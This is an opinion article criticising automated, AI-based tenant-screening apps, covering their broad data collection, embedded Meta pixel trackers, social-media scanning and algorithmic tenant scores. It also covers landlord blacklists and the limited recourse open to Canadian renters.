A Landlord's Dream and a Tenant's Nightmare
Automated tenant screening tools provide convenience for landlords and crushing concerns for prospective tenants
In the not too distant past it was important to be able to look a person in the eye and talk with them to size them up. Do they strike you as genuine? Honest? Trustworthy? Are they someone you could get along with as a colleague? Would they be a responsible tenant?
Meeting someone also gave them a chance to size you up for the same things, and more. And if they were a prospective renter, would they want you as a landlord?
First impressions were important — for people on both sides of a relationship.
But that was then, and this is now, with technological tools replacing human contact in many aspects of daily life.
Automated background-checking and tenant-screening tools have become a landlord’s dream and a renter’s nightmare. Required by an increasing number of landlords across the private and public sectors, these automated evaluation tools use artificial intelligence to streamline the application and vetting process.
Convenient online digital rental application tools facilitate a seamless consent-based exchange of data that helps landlords avoid tenants with unsavory rental histories. Or tenants that another landlord judged to be difficult or high-maintenance. Or those who broke a lease, whether to avoid paying rent or to escape domestic violence. Or those who share a name with someone else who has a criminal history or bad credit.
Many of the automated tools collect a wealth of information that allows landlords to understand — and make assumptions about — much more than what prospective tenants want. For instance, some digital rental apps require biometric data or copies of government-issued photo identification, ostensibly to be able to avoid fraud and misidentification. Others collect information unrelated to tenancy including details about prospective renters’ dependents and education, how tenants commute to work, and the weight and name of each of their pets. Still other landlords demand that prospective tenants provide the names and birthdays of all family members, copies of driver's licences, and other sensitive information before allowing the applicant to view a residence.
Common among many tenancy-screening apps is the automated scanning of social media accounts to collect personal information that might or might not be relevant to tenancies, including details that landlords are prohibited from requesting under human rights and anti-discrimination laws.
Reading privacy policies of some apps reveals that prospective tenants’ personal information will be shared with Facebook and advertisers, without any way for individuals to opt out of that occurring.
Prospective renters are not forewarned if their keystrokes will be being monitored or captured as they enter sensitive personal information Even worse, Facebook “Meta pixel” trackers embedded on rental apps’ websites can secretly collect personal data entered into forms (i.e., email address, search strings, phone number, name, date of birth, SSN/SIN etc.), automatically reveal it all to Facebook, and associate the details with applicants’ offline activities, social activities, and other information Facebook has compiled into a detailed profile — regardless whether or not the renter has a Facebook account.
Algorithms in tenant evaluation apps often use the information gathered from and about the applicant to assign a ‘score’ that reflects the algorithmic prediction of how likely a tenant is to cause damage to property, to be late on their rent (including by reason of actual or implied health or wellness issues that might prevent regular work), or to vacate before the lease expiry date.
Tenant screening apps can also evaluate a property’s “suitability” for a prospective tenant based on an “Analysis of how well the Applicant would fit with the rental property based on the Applicant’s intended use, as stated in their Application”
The results from tenant screening tools, combined with the ‘feedback’ about tenants that landlords enter into the automated system, is useful to streamline the rental application process. Tenant rental performance databases that include landlords’ commentaries — made available only to other landlords — can also serve as a blacklist that effectively hampers renters’ ability to qualify for housing.
Given that most tenant screening tools and the amassed databases are in the United States, Canadian renters have little recourse to gain access to or verify correctness of information collected about them; to know how decisions about them are made; or to have incorrect information corrected. Canada’s public and private sector landlords and rental management companies using the automated tenant-screening tools are subject to federal or provincial privacy laws; but an informal survey of government landlord and tenant dispute resolution departments across the country revealed only one had heard of the technologies, and none had received any complaints about their use or over-collection of personal information.
As for information being collected with consent, and renters having a choice whether or not to use the apps, the sad reality is that an increasing number of property owners and rental management companies require prospective tenants to apply through screening apps; so, anyone who is unwilling or unable to apply online has no chance of being considered. Anyone who wants to have any chance of renting a property whose landlord or rental agent uses automated tools has little real option but to use the automated tool, consent to the collection of whatever information the app requires, and submit to whatever demands are made by the landlord.
The increased awareness about informal tenant and landlord commentary sites on social media, and about artificial-intelligence based tools that evaluate and determine suitability for housing, jobs, and other necessaries of life, have spurred lawmakers to craft legislation to regulate the use of artificial intelligence; but preliminary efforts have not yet persuaded technology developers or property owners to correct the privacy-invasive power imbalance that persists.